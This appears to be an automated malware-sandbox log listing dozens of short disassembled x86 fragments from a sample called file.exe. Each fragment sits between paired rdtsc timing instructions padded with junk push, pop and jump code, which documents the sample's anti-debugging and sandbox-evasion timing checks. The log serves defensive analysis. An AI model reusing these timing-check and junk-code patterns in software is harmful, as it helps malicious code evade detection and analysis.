Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF733 second address: DEF73B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEFF72 second address: DEFF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F99D0DE6F30h 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F99D0DE6F2Ch 0x00000013 jl 00007F99D0DE6F2Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEFF9D second address: DEFFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEFFA3 second address: DEFFAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF06E1 second address: DF06E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE4B0 second address: DEE4D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F99D0DE6F26h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F99D0DE6F33h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE4D1 second address: DEE4E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jng 00007F99D0D12E16h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE4E9 second address: DEE4F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F99D0DE6F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F59 second address: DF8F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99D0D12E16h 0x0000000a popad 0x0000000b jmp 00007F99D0D12E1Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F79 second address: DF8F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F7F second address: DF8F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F85 second address: DF8F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F8A second address: DF8F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F99D0D12E16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F96 second address: DF8F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0AFCF second address: E0AFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0AFD4 second address: E0AFDD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22786 second address: E22791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22791 second address: E227B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F37h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F99D0DE6F2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E227B9 second address: E227BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E227BD second address: E227DC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99D0DE6F38h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22FEE second address: E22FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2804E second address: E28054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E281D9 second address: E281EB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99D0D12E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E281EB second address: E281EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2C72F second address: E2C75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Fh 0x00000009 jmp 00007F99D0D12E25h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2C75A second address: E2C773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F99D0DE6F2Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2C588 second address: E2C599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Ch 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2C599 second address: E2C59E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46E6C second address: E46E93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E27h 0x00000007 jmp 00007F99D0D12E1Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46E93 second address: E46EA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F99D0DE6F2Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E49B15 second address: E49B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F99D0D12E16h 0x00000009 jmp 00007F99D0D12E1Ch 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4984D second address: E4986F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F99D0DE6F26h 0x0000000a jng 00007F99D0DE6F2Ah 0x00000010 jo 00007F99D0DE6F32h 0x00000016 jp 00007F99D0DE6F26h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4986F second address: E49891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F99D0D12E1Ah 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F99D0D12E1Ah 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E49891 second address: E4989C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4989C second address: E498A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5F60E second address: E5F61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5F61B second address: E5F621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5F621 second address: E5F625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5F625 second address: E5F62B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6432C second address: E64338 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E64338 second address: E64344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F99D0D12E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E64344 second address: E6435C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F99D0DE6F32h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6435C second address: E64362 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E64362 second address: E6436E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E634E7 second address: E634EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63A3C second address: E63A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63A40 second address: E63A4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007F99D0D12E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63A4F second address: E63A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007F99D0DE6F32h 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F99D0DE6F26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63BD1 second address: E63BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E66F1E second address: E66F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E67244 second address: E67248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E67248 second address: E6728D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dh, cl 0x0000000e push dword ptr [ebp+122D3970h] 0x00000014 mov edx, dword ptr [ebp+122D2638h] 0x0000001a call 00007F99D0DE6F29h 0x0000001f jmp 00007F99D0DE6F33h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ecx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6728D second address: E67294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6BEE2 second address: E6BEE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6BEE6 second address: E6BEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6BEEF second address: E6BF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F38h 0x00000009 jl 00007F99D0DE6F26h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5570055 second address: 5570059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5570059 second address: 5570074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5570074 second address: 55700F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F99D0D12E27h 0x00000010 pop edx 0x00000011 call 00007F99D0D12E24h 0x00000016 mov bh, ch 0x00000018 pop ebx 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F99D0D12E1Fh 0x00000024 sub al, 0000002Eh 0x00000027 jmp 00007F99D0D12E29h 0x0000002c popfd 0x0000002d movzx ecx, dx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55700F8 second address: 55700FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500118 second address: 5500174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99D0D12E20h 0x0000000f push eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 jmp 00007F99D0D12E1Ch 0x00000017 pop esi 0x00000018 push edi 0x00000019 pushfd 0x0000001a jmp 00007F99D0D12E1Eh 0x0000001f sub esi, 5DE16B78h 0x00000025 jmp 00007F99D0D12E1Bh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500174 second address: 5500178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500178 second address: 550017E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550017E second address: 5500184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500184 second address: 55001B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99D0D12E1Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55001B0 second address: 5500248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0DE6F37h 0x00000009 add eax, 63D74DFEh 0x0000000f jmp 00007F99D0DE6F39h 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [ebp+04h] 0x0000001e jmp 00007F99D0DE6F33h 0x00000023 push dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ecx, ebx 0x0000002b pushfd 0x0000002c jmp 00007F99D0DE6F37h 0x00000031 sbb eax, 68703D6Eh 0x00000037 jmp 00007F99D0DE6F39h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500248 second address: 5500266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500266 second address: 5500279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500279 second address: 550027F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550027F second address: 5500283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55002AF second address: 55002B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55002B3 second address: 55002B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520C83 second address: 5520C89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55206E1 second address: 55206E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55206E5 second address: 55206EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55206EB second address: 5520732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99D0DE6F36h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 jmp 00007F99D0DE6F2Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 mov dl, ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520732 second address: 552074E instructions: 0x00000000 rdtsc 0x00000002 call 00007F99D0D12E1Dh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ebx 0x00000011 mov dl, al 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55205A3 second address: 5520606 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0DE6F36h 0x00000008 xor ax, E3A8h 0x0000000d jmp 00007F99D0DE6F2Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F99D0DE6F2Bh 0x00000022 xor si, F0EEh 0x00000027 jmp 00007F99D0DE6F39h 0x0000002c popfd 0x0000002d mov ax, B477h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520606 second address: 552061D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 38FA7E4Eh 0x00000008 mov dx, 315Ah 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552061D second address: 5520623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520623 second address: 5520629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552024A second address: 55202F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0DE6F30h 0x00000009 sbb al, FFFFFF98h 0x0000000c jmp 00007F99D0DE6F2Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F99D0DE6F38h 0x00000018 or ax, BCF8h 0x0000001d jmp 00007F99D0DE6F2Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 call 00007F99D0DE6F34h 0x0000002d mov ebx, eax 0x0000002f pop esi 0x00000030 pushfd 0x00000031 jmp 00007F99D0DE6F37h 0x00000036 sub cx, E61Eh 0x0000003b jmp 00007F99D0DE6F39h 0x00000040 popfd 0x00000041 popad 0x00000042 mov ebp, esp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55202F3 second address: 55202F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55202F7 second address: 55202FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55202FB second address: 5520301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520301 second address: 5520316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0DE6F31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530216 second address: 553021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560F27 second address: 5560F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560F2C second address: 5560F5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F99D0D12E29h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560F5E second address: 5560F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F99D0DE6F37h 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560F94 second address: 5560F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560F9A second address: 5560FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0DE6F34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55403BB second address: 55403D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
